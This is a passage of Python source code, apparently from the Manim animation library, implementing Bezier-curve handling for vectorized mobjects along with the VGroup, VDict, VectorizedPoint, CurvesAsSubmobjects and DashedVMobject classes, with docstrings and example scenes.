Points (anchor and handle, or just anchor) to add a smooth curve from
Returns
-------
VMobject
Raises
------
ValueError
If 0 or more than 2 points are given.
"""
# TODO remove the value error and just add two parameters with one optional
if len(points) == 1:
handle2 = None
new_anchor = points[0]
elif len(points) == 2:
handle2, new_anchor = points
else:
name = sys._getframe(0).f_code.co_name
raise ValueError(f"Only call {name} with 1 or 2 points")
if self.has_new_path_started():
self.add_line_to(new_anchor)
else:
self.throw_error_if_no_points()
last_h2, last_a2 = self.points[-2:]
last_tangent = last_a2 - last_h2
handle1 = last_a2 + last_tangent
if handle2 is None:
to_anchor_vect = new_anchor - last_a2
new_tangent = rotate_vector(last_tangent, PI, axis=to_anchor_vect)
handle2 = new_anchor - new_tangent
self.append_points([last_a2, handle1, handle2, new_anchor])
return self
def has_new_path_started(self):
nppcc = self.n_points_per_cubic_curve # 4
# A new path starting is defined by a control point which is not part of a bezier subcurve.
return len(self.points) % nppcc == 1
def get_last_point(self):
return self.points[-1]
def is_closed(self):
# TODO use consider_points_equals_2d ?
return self.consider_points_equals(self.points[0], self.points[-1])
def add_points_as_corners(self, points: np.ndarray) -> "VMobject":
for point in points:
self.add_line_to(point)
return points
def set_points_as_corners(self, points: Sequence[float]) -> "VMobject":
"""Given an array of points, set them as corner of the vmobject.
To achieve that, this algorithm sets handles aligned with the anchors such that the resultant bezier curve will be the segment
between the two anchors.
Parameters
----------
points : Iterable[float]
Array of points that will be set as corners.
Returns
-------
VMobject
self. For chaining purposes.
"""
nppcc = self.n_points_per_cubic_curve
points = np.array(points)
# This will set the handles aligned with the anchors.
# Id est, a bezier curve will be the segment from the two anchors such that the handles belongs to this segment.
self.set_anchors_and_handles(
*[interpolate(points[:-1], points[1:], a) for a in np.linspace(0, 1, nppcc)]
)
return self
def set_points_smoothly(self, points):
self.set_points_as_corners(points)
self.make_smooth()
return self
def change_anchor_mode(self, mode: str) -> "VMobject":
"""Changes the anchor mode of the bezier curves. This will modify the handles.
There can be only two modes, "jagged", and "smooth".
Returns
-------
VMobject
For chaining purposes.
"""
assert mode in ["jagged", "smooth"]
nppcc = self.n_points_per_cubic_curve
for submob in self.family_members_with_points():
subpaths = submob.get_subpaths()
submob.clear_points()
# A subpath can be composed of several bezier curves.
for subpath in subpaths:
# This will retrieve the anchors of the subpath, by selecting every n element in the array subpath
# The append is needed as the last element is not reached when slicing with numpy.
anchors = np.append(subpath[::nppcc], subpath[-1:], 0)
if mode == "smooth":
h1, h2 = get_smooth_handle_points(anchors)
elif mode == "jagged":
# The following will make the handles aligned with the anchors, thus making the bezier curve a segment
a1 = anchors[:-1]
a2 = anchors[1:]
h1 = interpolate(a1, a2, 1.0 / 3)
h2 = interpolate(a1, a2, 2.0 / 3)
new_subpath = np.array(subpath)
new_subpath[1::nppcc] = h1
new_subpath[2::nppcc] = h2
submob.append_points(new_subpath)
return self
def make_smooth(self):
return self.change_anchor_mode("smooth")
def make_jagged(self):
return self.change_anchor_mode("jagged")
def add_subpath(self, points: np.ndarray) -> "VMobject":
assert len(points) % 4 == 0
self.points = np.append(self.points, points, axis=0)
return self
def append_vectorized_mobject(self, vectorized_mobject):
new_points = list(vectorized_mobject.points)
if self.has_new_path_started():
# Remove last point, which is starting
# a new path
self.points = self.points[:-1]
self.append_points(new_points)
def apply_function(self, function):
factor = self.pre_function_handle_to_anchor_scale_factor
self.scale_handle_to_anchor_distances(factor)
Mobject.apply_function(self, function)
self.scale_handle_to_anchor_distances(1.0 / factor)
if self.make_smooth_after_applying_functions:
self.make_smooth()
return self
def scale_handle_to_anchor_distances(self, factor: float) -> "VMobject":
"""If the distance between a given handle point H and its associated
anchor point A is d, then it changes H to be a distances factor*d
away from A, but so that the line from A to H doesn't change.
This is mostly useful in the context of applying a (differentiable)
function, to preserve tangency properties. One would pull all the
handles closer to their anchors, apply the function then push them out
again.
Parameters
----------
factor
The factor used for scaling.
Returns
-------
VMobject
For chaining.
"""
for submob in self.family_members_with_points():
if len(submob.points) < self.n_points_per_cubic_curve:
# The case that a bezier quad is not complete (there is no bezier curve as there is not enough control points.)
continue
a1, h1, h2, a2 = submob.get_anchors_and_handles()
a1_to_h1 = h1 - a1
a2_to_h2 = h2 - a2
new_h1 = a1 + factor * a1_to_h1
new_h2 = a2 + factor * a2_to_h2
submob.set_anchors_and_handles(a1, new_h1, new_h2, a2)
return self
#
def consider_points_equals(self, p0, p1):
return np.allclose(p0, p1, atol=self.tolerance_for_point_equality)
def consider_points_equals_2d(self, p0: np.ndarray, p1: np.ndarray) -> bool:
"""Determine if two points are close enough to be considered equal.
This uses the algorithm from np.isclose(), but expanded here for the
2D point case. NumPy is overkill for such a small question.
Parameters
----------
p0 : np.ndarray
first point
p1 : np.ndarray
second point
Returns
-------
bool
whether two points considered close.
"""
rtol = 1.0e-5 # default from np.isclose()
atol = self.tolerance_for_point_equality
if abs(p0[0] - p1[0]) > atol + rtol * abs(p1[0]):
return False
if abs(p0[1] - p1[1]) > atol + rtol * abs(p1[1]):
return False
return True
# Information about line
def get_cubic_bezier_tuples_from_points(self, points):
return np.array(list(self.gen_cubic_bezier_tuples_from_points(points)))
def gen_cubic_bezier_tuples_from_points(self, points: np.ndarray) -> typing.Tuple:
"""Returns the bezier tuples from an array of points.
self.points is a list of the anchors and handles of the bezier curves of the mobject (ie [anchor1, handle1, handle2, anchor2, anchor3 ..])
This algorithm basically retrieve them by taking an element every n, where n is the number of control points
of the bezier curve.
Parameters
----------
points : np.ndarray
Points from which control points will be extracted.
Returns
-------
typing.Tuple
Bezier control points.
"""
nppcc = self.n_points_per_cubic_curve
remainder = len(points) % nppcc
points = points[: len(points) - remainder]
# Basically take every nppcc element.
return (points[i : i + nppcc] for i in range(0, len(points), nppcc))
def get_cubic_bezier_tuples(self):
return self.get_cubic_bezier_tuples_from_points(self.get_points())
def _gen_subpaths_from_points(
self, points: np.ndarray, filter_func: typing.Callable[[int], bool]
) -> typing.Tuple:
"""Given an array of points defining the bezier curves of the vmobject, return subpaths formed by these points.
Here, Two bezier curves form a path if at least two of their anchors are evaluated True by the relation defined by filter_func.
The algorithm every bezier tuple (anchors and handles) in ``self.points`` (by regrouping each n elements, where
n is the number of points per cubic curve)), and evaluate the relation between two anchors with filter_func.
NOTE : The filter_func takes an int n as paramater, and will evaluate the relation between points[n] and points[n - 1]. This should probably be changed so
the function takes two points as paramters.
Parameters
----------
points : np.ndarray
points defining the bezier curve.
filter_func : typing.Callable[int, bool]
Filter-func defining the relation.
Returns
-------
typing.Tuple
subpaths formed by the points.
"""
nppcc = self.n_points_per_cubic_curve
filtered = filter(filter_func, range(nppcc, len(points), nppcc))
split_indices = [0] + list(filtered) + [len(points)]
return (
points[i1:i2]
for i1, i2 in zip(split_indices, split_indices[1:])
if (i2 - i1) >= nppcc
)
def get_subpaths_from_points(self, points):
return list(
self._gen_subpaths_from_points(
points,
lambda n: not self.consider_points_equals(points[n - 1], points[n]),
)
)
def gen_subpaths_from_points_2d(self, points):
return self._gen_subpaths_from_points(
points,
lambda n: not self.consider_points_equals_2d(points[n - 1], points[n]),
)
def get_subpaths(self) -> typing.Tuple:
"""Returns subpaths formed by the curves of the VMobject.
We define a subpath between two curve if one of their extreminities are coincidents.
Returns
-------
typing.Tuple
subpaths.
"""
return self.get_subpaths_from_points(self.get_points())
def get_nth_curve_points(self, n: int) -> np.ndarray:
"""Returns the points defining the nth curve of the vmobject.
Parameters
----------
n : int
index of the desired bezier curve.
Returns
-------
np.ndarray
points defininf the nth bezier curve (anchors, handles)
"""
assert n < self.get_num_curves()
nppcc = self.n_points_per_cubic_curve
return self.points[nppcc * n : nppcc * (n + 1)]
def get_nth_curve_function(self, n: int) -> typing.Callable[[float], np.ndarray]:
"""Returns the expression of the nth curve.
Parameters
----------
n : int
index of the desired curve.
Returns
-------
typing.Callable[float]
expression of the nth bezier curve.
"""
return bezier(self.get_nth_curve_points(n))
def get_nth_curve_function_with_length(
self, n: int, sample_points: Optional[int] = None
) -> typing.Tuple[typing.Callable[[float], np.ndarray], float]:
"""Returns the expression of the nth curve along with its (approximate) length.
Parameters
----------
n
The index of the desired curve.
sample_points
The number of points to sample to find the length.
Returns
-------
curve : typing.Callable[[float], np.ndarray]
The function for the nth curve.
length : :class:`float`
The length of the nth curve.
"""
if sample_points is None:
sample_points = 10
curve = self.get_nth_curve_function(n)
points = np.array([curve(a) for a in np.linspace(0, 1, sample_points)])
diffs = points[1:] - points[:-1]
norms = np.apply_along_axis(np.linalg.norm, 1, diffs)
length = np.sum(norms)
return curve, length
def get_num_curves(self) -> int:
"""Returns the number of curves of the vmobject.
Returns
-------
int
number of curves. of the vmobject.
"""
nppcc = self.n_points_per_cubic_curve
return len(self.points) // nppcc
def get_curve_functions(
self,
) -> typing.Iterable[typing.Callable[[float], np.ndarray]]:
"""Gets the functions for the curves of the mobject.
Returns
-------
typing.Iterable[typing.Callable[[float], np.ndarray]]
The functions for the curves.
"""
num_curves = self.get_num_curves()
for n in range(num_curves):
yield self.get_nth_curve_function(n)
def get_curve_functions_with_lengths(
self, **kwargs
) -> typing.Iterable[typing.Tuple[typing.Callable[[float], np.ndarray], float]]:
"""Gets the functions and lengths of the curves for the mobject.
Parameters
----------
**kwargs
The keyword arguments passed to :meth:`get_nth_curve_function_with_length`
Returns
-------
typing.Iterable[typing.Tuple[typing.Callable[[float], np.ndarray], float]]
The functions and lengths of the curves.
"""
num_curves = self.get_num_curves()
for n in range(num_curves):
yield self.get_nth_curve_function_with_length(n, **kwargs)
def point_from_proportion(self, alpha: float) -> np.ndarray:
"""Gets the point at a proportion along the path of the :class:`VMobject`.
Parameters
----------
alpha
The proportion along the the path of the :class:`VMobject`.
Returns
-------
:class:`numpy.ndarray`
The point on the :class:`VMobject`.
Raises
------
:exc:`ValueError`
If ``alpha`` is not between 0 and 1.
:exc:`Exception`
If the :class:`VMobject` has no points.
"""
if alpha < 0 or alpha > 1:
raise ValueError(f"Alpha {alpha} not between 0 and 1.")
self.throw_error_if_no_points()
if alpha == 1:
return self.get_points()[-1]
curves_and_lengths = tuple(self.get_curve_functions_with_lengths())
target_length = alpha * np.sum(length for _, length in curves_and_lengths)
current_length = 0
for curve, length in curves_and_lengths:
if current_length + length >= target_length:
if length != 0:
residue = (target_length - current_length) / length
else:
residue = 0
return curve(residue)
current_length += length
def get_anchors_and_handles(self) -> typing.Iterable[np.ndarray]:
"""Returns anchors1, handles1, handles2, anchors2,
where (anchors1[i], handles1[i], handles2[i], anchors2[i])
will be four points defining a cubic bezier curve
for any i in range(0, len(anchors1))
Returns
-------
typing.Iterable[np.ndarray]
Iterable of the anchors and handles.
"""
nppcc = self.n_points_per_cubic_curve
return [self.points[i::nppcc] for i in range(nppcc)]
def get_start_anchors(self) -> np.ndarray:
"""Returns the start anchors of the bezier curves.
Returns
-------
np.ndarray
Starting anchors
"""
return self.points[0 :: self.n_points_per_cubic_curve]
def get_end_anchors(self) -> np.ndarray:
"""Return the starting anchors of the bezier curves.
Returns
-------
np.ndarray
Starting anchors
"""
nppcc = self.n_points_per_cubic_curve
return self.points[nppcc - 1 :: nppcc]
def get_anchors(self) -> np.ndarray:
"""Returns the anchors of the curves forming the VMobject.
Returns
-------
np.ndarray
The anchors.
"""
if self.points.shape[0] == 1:
return self.points
return np.array(
list(it.chain(*zip(self.get_start_anchors(), self.get_end_anchors())))
)
def get_points_defining_boundary(self):
# Probably returns all anchors, but this is weird regarding the name of the method.
return np.array(list(it.chain(*[sm.get_anchors() for sm in self.get_family()])))
def get_arc_length(self, sample_points_per_curve: Optional[int] = None) -> float:
"""Return the approximated length of the whole curve.
Parameters
----------
sample_points_per_curve
Number of sample points per curve used to approximate the length. More points result in a better approximation.
Returns
-------
float
The length of the :class:`VMobject`.
"""
return np.sum(
length
for _, length in self.get_curve_functions_with_lengths(
sample_points=sample_points_per_curve
)
)
# Alignment
def align_points(self, vmobject):
# This probably makes the current vmobject and the given one have the same number of points,
# by adding extra points to the last sub-path. This method is never used in the whole library.
self.align_rgbas(vmobject)
if self.get_num_points() == vmobject.get_num_points():
return
for mob in self, vmobject:
# If there are no points, add one to
# wherever the "center" is
if mob.has_no_points():
mob.start_new_path(mob.get_center())
# If there's only one point, turn it into
# a null curve
if mob.has_new_path_started():
mob.add_line_to(mob.get_last_point())
# Figure out what the subpaths are, and align
subpaths1 = self.get_subpaths()
subpaths2 = vmobject.get_subpaths()
n_subpaths = max(len(subpaths1), len(subpaths2))
# Start building new ones
new_path1 = np.zeros((0, self.dim))
new_path2 = np.zeros((0, self.dim))
nppcc = self.n_points_per_cubic_curve
def get_nth_subpath(path_list, n):
if n >= len(path_list):
# Create a null path at the very end
return [path_list[-1][-1]] * nppcc
return path_list[n]
for n in range(n_subpaths):
sp1 = get_nth_subpath(subpaths1, n)
sp2 = get_nth_subpath(subpaths2, n)
diff1 = max(0, (len(sp2) - len(sp1)) // nppcc)
diff2 = max(0, (len(sp1) - len(sp2)) // nppcc)
sp1 = self.insert_n_curves_to_point_list(diff1, sp1)
sp2 = self.insert_n_curves_to_point_list(diff2, sp2)
new_path1 = np.append(new_path1, sp1, axis=0)
new_path2 = np.append(new_path2, sp2, axis=0)
self.set_points(new_path1)
vmobject.set_points(new_path2)
return self
def insert_n_curves(self, n: int) -> "VMobject":
"""Inserts n curves to the bezier curves of the vmobject.
Parameters
----------
n
Number of curves to insert.
Returns
-------
VMobject
for chaining.
"""
new_path_point = None
if self.has_new_path_started():
new_path_point = self.get_last_point()
new_points = self.insert_n_curves_to_point_list(n, self.get_points())
self.set_points(new_points)
if new_path_point is not None:
self.append_points([new_path_point])
return self
def insert_n_curves_to_point_list(self, n: int, points: np.ndarray) -> np.ndarray:
"""Given an array of k points defining a bezier curves (anchors and handles), returns points defining exactly k + n bezier curves.
Parameters
----------
n : int
Number of desired curves.
points : np.ndarray
Starting points.
Returns
-------
np.ndarray
Points generated.
"""
if len(points) == 1:
nppcc = self.n_points_per_cubic_curve
return np.repeat(points, nppcc * n, 0)
bezier_quads = self.get_cubic_bezier_tuples_from_points(points)
curr_num = len(bezier_quads)
target_num = curr_num + n
# This is an array with values ranging from 0
# up to curr_num, with repeats such that
# it's total length is target_num. For example,
# with curr_num = 10, target_num = 15, this would
# be [0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9]
repeat_indices = (np.arange(target_num) * curr_num) // target_num
# If the nth term of this list is k, it means
# that the nth curve of our path should be split
# into k pieces. In the above example, this would
# be [2, 1, 2, 1, 2, 1, 2, 1, 2, 1]
split_factors = [sum(repeat_indices == i) for i in range(curr_num)]
new_points = np.zeros((0, self.dim))
for quad, sf in zip(bezier_quads, split_factors):
# What was once a single cubic curve defined
# by "quad" will now be broken into sf
# smaller cubic curves
alphas = np.linspace(0, 1, sf + 1)
for a1, a2 in zip(alphas, alphas[1:]):
new_points = np.append(
new_points, partial_bezier_points(quad, a1, a2), axis=0
)
return new_points
def align_rgbas(self, vmobject):
attrs = ["fill_rgbas", "stroke_rgbas", "background_stroke_rgbas"]
for attr in attrs:
a1 = getattr(self, attr)
a2 = getattr(vmobject, attr)
if len(a1) > len(a2):
new_a2 = stretch_array_to_length(a2, len(a1))
setattr(vmobject, attr, new_a2)
elif len(a2) > len(a1):
new_a1 = stretch_array_to_length(a1, len(a2))
setattr(self, attr, new_a1)
return self
def get_point_mobject(self, center=None):
if center is None:
center = self.get_center()
point = VectorizedPoint(center)
point.match_style(self)
return point
def interpolate_color(self, mobject1, mobject2, alpha):
attrs = [
"fill_rgbas",
"stroke_rgbas",
"background_stroke_rgbas",
"stroke_width",
"background_stroke_width",
"sheen_direction",
"sheen_factor",
]
for attr in attrs:
setattr(
self,
attr,
interpolate(getattr(mobject1, attr), getattr(mobject2, attr), alpha),
)
if alpha == 1.0:
setattr(self, attr, getattr(mobject2, attr))
def pointwise_become_partial(
self, vmobject: "VMobject", a: float, b: float
) -> "VMobject":
"""Given two bounds a and b, transforms the points of the self vmobject into the points of the vmobject
passed as parameter with respect to the bounds. Points here stand for control points of the bezier curves (anchors and handles)
Parameters
----------
vmobject : VMobject
The vmobject that will serve as a model.
a : float
upper-bound.
b : float
lower-bound
"""
assert isinstance(vmobject, VMobject)
# Partial curve includes three portions:
# - A middle section, which matches the curve exactly
# - A start, which is some ending portion of an inner cubic
# - An end, which is the starting portion of a later inner cubic
if a <= 0 and b >= 1:
self.set_points(vmobject.points)
return self
bezier_quads = vmobject.get_cubic_bezier_tuples()
num_cubics = len(bezier_quads)
# The following two lines will compute which bezier curves of the given mobject need to be processed.
# The residue basically indicates de proportion of the selected bezier curve that have to be selected.
# Ex : if lower_index is 3, and lower_residue is 0.4, then the algorithm will append to the points 0.4 of the third bezier curve
lower_index, lower_residue = integer_interpolate(0, num_cubics, a)
upper_index, upper_residue = integer_interpolate(0, num_cubics, b)
self.clear_points()
if num_cubics == 0:
return self
if lower_index == upper_index:
self.append_points(
partial_bezier_points(
bezier_quads[lower_index], lower_residue, upper_residue
)
)
else:
self.append_points(
partial_bezier_points(bezier_quads[lower_index], lower_residue, 1)
)
for quad in bezier_quads[lower_index + 1 : upper_index]:
self.append_points(quad)
self.append_points(
partial_bezier_points(bezier_quads[upper_index], 0, upper_residue)
)
return self
def get_subcurve(self, a: float, b: float) -> "VMobject":
"""Returns the subcurve of the VMobject between the interval [a, b].
The curve is a VMobject itself.
Parameters
----------
a
The lower bound.
b
The upper bound.
Returns
-------
VMobject
The subcurve between of [a, b]
"""
vmob = self.copy()
vmob.pointwise_become_partial(self, a, b)
return vmob
def get_direction(self):
"""Uses :func:`~.space_ops.shoelace_direction` to calculate the direction.
The direction of points determines in which direction the
object is drawn, clockwise or counterclockwise.
Examples
--------
The default direction of a :class:`~.Circle` is counterclockwise::
>>> from manim import Circle
>>> Circle().get_direction()
'CCW'
Returns
-------
:class:`str`
Either ``"CW"`` or ``"CCW"``.
"""
return shoelace_direction(self.get_start_anchors())
def reverse_direction(self):
"""Reverts the point direction by inverting the point order.
Returns
-------
:class:`VMobject`
Returns self.
Examples
--------
.. manim:: ChangeOfDirection
class ChangeOfDirection(Scene):
def construct(self):
ccw = RegularPolygon(5)
ccw.shift(LEFT).rotate
cw = RegularPolygon(5)
cw.shift(RIGHT).reverse_direction()
self.play(Create(ccw), Create(cw),
run_time=4)
"""
self.points = self.points[::-1]
return self
def force_direction(self, target_direction):
"""Makes sure that points are either directed clockwise or
counterclockwise.
Parameters
----------
target_direction : :class:`str`
Either ``"CW"`` or ``"CCW"``.
"""
if target_direction not in ("CW", "CCW"):
raise ValueError('Invalid input for force_direction. Use "CW" or "CCW"')
if self.get_direction() != target_direction:
# Since we already assured the input is CW or CCW,
# and the directions don't match, we just reverse
self.reverse_direction()
return self
class VGroup(VMobject):
"""A group of vectorized mobjects.
This can be used to group multiple :class:`~.VMobject` instances together
in order to scale, move, ... them together.
Examples
--------
To add :class:`~.VMobject`s to a :class:`~.VGroup`, you can either use the
:meth:`~.VGroup.add` method, or use the `+` and `+=` operators. Similarly, you
can subtract elements of a VGroup via :meth:`~.VGroup.remove` method, or
`-` and `-=` operators:
>>> from manim import Triangle, Square, VGroup
>>> vg = VGroup()
>>> triangle, square = Triangle(), Square()
>>> vg.add(triangle)
VGroup(Triangle)
>>> vg + square # a new VGroup is constructed
VGroup(Triangle, Square)
>>> vg # not modified
VGroup(Triangle)
>>> vg += square; vg # modifies vg
VGroup(Triangle, Square)
>>> vg.remove(triangle)
VGroup(Square)
>>> vg - square; # a new VGroup is constructed
VGroup()
>>> vg # not modified
VGroup(Square)
>>> vg -= square; vg # modifies vg
VGroup()
.. manim:: ArcShapeIris
:save_last_frame:
class ArcShapeIris(Scene):
def construct(self):
colors = [DARK_BROWN, BLUE_E, BLUE_D, BLUE_A, TEAL_B, GREEN_B, YELLOW_E]
radius = [1 + rad * 0.1 for rad in range(len(colors))]
circles_group = VGroup()
# zip(radius, color) makes the iterator [(radius[i], color[i]) for i in range(radius)]
circles_group.add(*[Circle(radius=rad, stroke_width=10, color=col)
for rad, col in zip(radius, colors)])
self.add(circles_group)
"""
def __init__(self, *vmobjects, **kwargs):
VMobject.__init__(self, **kwargs)
self.add(*vmobjects)
def __repr__(self):
return (
self.__class__.__name__
+ "("
+ ", ".join(str(mob) for mob in self.submobjects)
+ ")"
)
def __str__(self):
return (
f"{self.__class__.__name__} of {len(self.submobjects)} "
f"submobject{'s' if len(self.submobjects) > 0 else ''}"
)
def add(self, *vmobjects):
"""Checks if all passed elements are an instance of VMobject and then add them to submobjects
Parameters
----------
vmobjects : :class:`~.VMobject`
List of VMobject to add
Returns
-------
:class:`VGroup`
Raises
------
TypeError
If one element of the list is not an instance of VMobject
Examples
--------
.. manim:: AddToVGroup
class AddToVGroup(Scene):
def construct(self):
circle_red = Circle(color=RED)
circle_green = Circle(color=GREEN)
circle_blue = Circle(color=BLUE)
circle_red.shift(LEFT)
circle_blue.shift(RIGHT)
gr = VGroup(circle_red, circle_green)
gr2 = VGroup(circle_blue) # Constructor uses add directly
self.add(gr,gr2)
self.wait()
gr += gr2 # Add group to another
self.play(
gr.animate.shift(DOWN),
)
gr -= gr2 # Remove group
self.play( # Animate groups separately
gr.animate.shift(LEFT),
gr2.animate.shift(UP),
)
self.play( #Animate groups without modification
(gr+gr2).animate.shift(RIGHT)
)
self.play( # Animate group without component
(gr-circle_red).animate.shift(RIGHT)
)
"""
if not all(isinstance(m, VMobject) for m in vmobjects):
raise TypeError("All submobjects must be of type VMobject")
return super().add(*vmobjects)
def __add__(self, vmobject):
return VGroup(*self.submobjects, vmobject)
def __iadd__(self, vmobject):
return self.add(vmobject)
def __sub__(self, vmobject):
copy = VGroup(*self.submobjects)
copy.remove(vmobject)
return copy
def __isub__(self, vmobject):
return self.remove(vmobject)
class VDict(VMobject):
"""A VGroup-like class, also offering submobject access by
key, like a python dict
Parameters
----------
mapping_or_iterable : Union[:class:`Mapping`, Iterable[Tuple[Hashable, :class:`~.VMobject`]]], optional
The parameter specifying the key-value mapping of keys and mobjects.
show_keys : :class:`bool`, optional
Whether to also display the key associated with
the mobject. This might be useful when debugging,
especially when there are a lot of mobjects in the
:class:`VDict`. Defaults to False.
kwargs : Any
Other arguments to be passed to `Mobject`.
Attributes
----------
show_keys : :class:`bool`
Whether to also display the key associated with
the mobject. This might be useful when debugging,
especially when there are a lot of mobjects in the
:class:`VDict`. When displayed, the key is towards
the left of the mobject.
Defaults to False.
submob_dict : :class:`dict`
Is the actual python dictionary that is used to bind
the keys to the mobjects.
Examples
--------
.. manim:: ShapesWithVDict
class ShapesWithVDict(Scene):
def construct(self):
square = Square().set_color(RED)
circle = Circle().set_color(YELLOW).next_to(square, UP)
# create dict from list of tuples each having key-mobject pair
pairs = [("s", square), ("c", circle)]
my_dict = VDict(pairs, show_keys=True)
# display it just like a VGroup
self.play(Create(my_dict))
self.wait()
text = Tex("Some text").set_color(GREEN).next_to(square, DOWN)
# add a key-value pair by wrapping it in a single-element list of tuple
# after attrs branch is merged, it will be easier like `.add(t=text)`
my_dict.add([("t", text)])
self.wait()
rect = Rectangle().next_to(text, DOWN)
# can also do key assignment like a python dict
my_dict["r"] = rect
# access submobjects like a python dict
my_dict["t"].set_color(PURPLE)
self.play(my_dict["t"].animate.scale(3))
self.wait()
# also supports python dict styled reassignment
my_dict["t"] = Tex("Some other text").set_color(BLUE)
self.wait()
# remove submobject by key
my_dict.remove("t")
self.wait()
self.play(Uncreate(my_dict["s"]))
self.wait()
self.play(FadeOut(my_dict["c"]))
self.wait()
self.play(FadeOut(my_dict["r"], shift=DOWN))
self.wait()
# you can also make a VDict from an existing dict of mobjects
plain_dict = {
1: Integer(1).shift(DOWN),
2: Integer(2).shift(2 * DOWN),
3: Integer(3).shift(3 * DOWN),
}
vdict_from_plain_dict = VDict(plain_dict)
vdict_from_plain_dict.shift(1.5 * (UP + LEFT))
self.play(Create(vdict_from_plain_dict))
# you can even use zip
vdict_using_zip = VDict(zip(["s", "c", "r"], [Square(), Circle(), Rectangle()]))
vdict_using_zip.shift(1.5 * RIGHT)
self.play(Create(vdict_using_zip))
self.wait()
"""
def __init__(self, mapping_or_iterable={}, show_keys=False, **kwargs):
VMobject.__init__(self, **kwargs)
self.show_keys = show_keys
self.submob_dict = {}
self.add(mapping_or_iterable)
def __repr__(self):
return __class__.__name__ + "(" + repr(self.submob_dict) + ")"
def add(self, mapping_or_iterable):
"""Adds the key-value pairs to the :class:`VDict` object.
Also, it internally adds the value to the `submobjects` :class:`list`
of :class:`~.Mobject`, which is responsible for actual on-screen display.
Parameters
---------
mapping_or_iterable : Union[:class:`Mapping`, Iterable[Tuple[Hashable, :class:`~.VMobject`]]], optional
The parameter specifying the key-value mapping of keys and mobjects.
Returns
-------
:class:`VDict`
Returns the :class:`VDict` object on which this method was called.
Examples
--------
Normal usage::
square_obj = Square()
my_dict.add([('s', square_obj)])
"""
for key, value in dict(mapping_or_iterable).items():
self.add_key_value_pair(key, value)
return self
def remove(self, key):
"""Removes the mobject from the :class:`VDict` object having the key `key`
Also, it internally removes the mobject from the `submobjects` :class:`list`
of :class:`~.Mobject`, (which is responsible for removing it from the screen)
Parameters
----------
key : :class:`typing.Hashable`
The key of the submoject to be removed.
Returns
-------
:class:`VDict`
Returns the :class:`VDict` object on which this method was called.
Examples
--------
Normal usage::
my_dict.remove('square')
"""
if key not in self.submob_dict:
raise KeyError("The given key '%s' is not present in the VDict" % str(key))
super().remove(self.submob_dict[key])
del self.submob_dict[key]
return self
def __getitem__(self, key):
"""Override the [] operator for item retrieval.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submoject to be accessed
Returns
-------
:class:`VMobject`
The submobject corresponding to the key `key`
Examples
--------
Normal usage::
self.play(Create(my_dict['s']))
"""
submob = self.submob_dict[key]
return submob
def __setitem__(self, key, value):
"""Override the [] operator for item assignment.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submoject to be assigned
value : :class:`VMobject`
The submobject to bind the key to
Returns
-------
None
Examples
--------
Normal usage::
square_obj = Square()
my_dict['sq'] = square_obj
"""
if key in self.submob_dict:
self.remove(key)
self.add([(key, value)])
def __delitem__(self, key):
"""Override the del operator for deleting an item.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submoject to be deleted
Returns
-------
None
Examples
--------
::
>>> from manim import *
>>> my_dict = VDict({'sq': Square()})
>>> 'sq' in my_dict
True
>>> del my_dict['sq']
>>> 'sq' in my_dict
False
Notes
-----
Removing an item from a VDict does not remove that item from any Scene
that the VDict is part of.
"""
del self.submob_dict[key]
def __contains__(self, key):
"""Override the in operator.
Parameters
----------
key : :class:`typing.Hashable`
The key to check membership of.
Returns
-------
:class:`bool`
Examples
--------
::
>>> from manim import *
>>> my_dict = VDict({'sq': Square()})
>>> 'sq' in my_dict
True
"""
return key in self.submob_dict
def get_all_submobjects(self):
"""To get all the submobjects associated with a particular :class:`VDict` object
Returns
-------
:class:`dict_values`
All the submobjects associated with the :class:`VDict` object
Examples
--------
Normal usage::
for submob in my_dict.get_all_submobjects():
self.play(Create(submob))
"""
submobjects = self.submob_dict.values()
return submobjects
def add_key_value_pair(self, key, value):
"""A utility function used by :meth:`add` to add the key-value pair
to :attr:`submob_dict`. Not really meant to be used externally.
Parameters
----------
key : :class:`typing.Hashable`
The key of the submobject to be added.
value : :class:`~.VMobject`
The mobject associated with the key
Returns
-------
None
Raises
------
TypeError
If the value is not an instance of VMobject
Examples
--------
Normal usage::
square_obj = Square()
self.add_key_value_pair('s', square_obj)
"""
if not isinstance(value, VMobject):
raise TypeError("All submobjects must be of type VMobject")
mob = value
if self.show_keys:
# This import is here and not at the top to avoid circular import
from ...mobject.svg.tex_mobject import Tex
key_text = Tex(str(key)).next_to(value, LEFT)
mob.add(key_text)
self.submob_dict[key] = mob
super().add(value)
class VectorizedPoint(metaclass=MetaVMobject):
def __init__(
self,
location=ORIGIN,
color=BLACK,
fill_opacity=0,
stroke_width=0,
artificial_width=0.01,
artificial_height=0.01,
**kwargs,
):
self.artificial_width = artificial_width
self.artificial_height = artificial_height
super().__init__(
color=color,
fill_opacity=fill_opacity,
stroke_width=stroke_width,
**kwargs,
)
self.set_points(np.array([location]))
basecls = OpenGLVMobject if config.renderer == "opengl" else VMobject
@basecls.width.getter
def width(self):
return self.artificial_width
@basecls.height.getter
def height(self):
return self.artificial_height
def get_location(self):
return np.array(self.points[0])
def set_location(self, new_loc):
self.set_points(np.array([new_loc]))
class CurvesAsSubmobjects(VGroup):
"""Convert a curve's elements to submobjects.
Examples
--------
.. manim:: LineGradientExample
:save_last_frame:
class LineGradientExample(Scene):
def construct(self):
curve = ParametricFunction(lambda t: [t, np.sin(t), 0], t_min = -PI, t_max=PI,stroke_width=10)
new_curve = CurvesAsSubmobjects(curve)
new_curve.set_color_by_gradient(BLUE, RED)
self.add(new_curve.shift(UP), curve)
"""
def __init__(self, vmobject, **kwargs):
VGroup.__init__(self, **kwargs)
tuples = vmobject.get_cubic_bezier_tuples()
for tup in tuples:
part = VMobject()
part.set_points(tup)
part.match_style(vmobject)
self.add(part)
class DashedVMobject(metaclass=MetaVMobject):
def __init__(
self, vmobject, num_dashes=15, positive_space_ratio=0.5, color=WHITE, **kwargs
):
self.num_dashes = num_dashes
self.positive_space_ratio = positive_space_ratio
super().__init__(color=color, **kwargs)
ps_ratio = self.positive_space_ratio
if num_dashes > 0:
# End points of the unit interval for division
alphas = np.linspace(0, 1, num_dashes + 1)
# This determines the length of each "dash"
full_d_alpha = 1.0 / num_dashes
partial_d_alpha = full_d_alpha * ps_ratio
# Shifts the alphas and removes the last dash
# to give closed shapes even spacing
if vmobject.is_closed():
alphas += partial_d_alpha / 2
np.delete(alphas, -1)
# Rescale so that the last point of vmobject will
# be the end of the last dash
else:
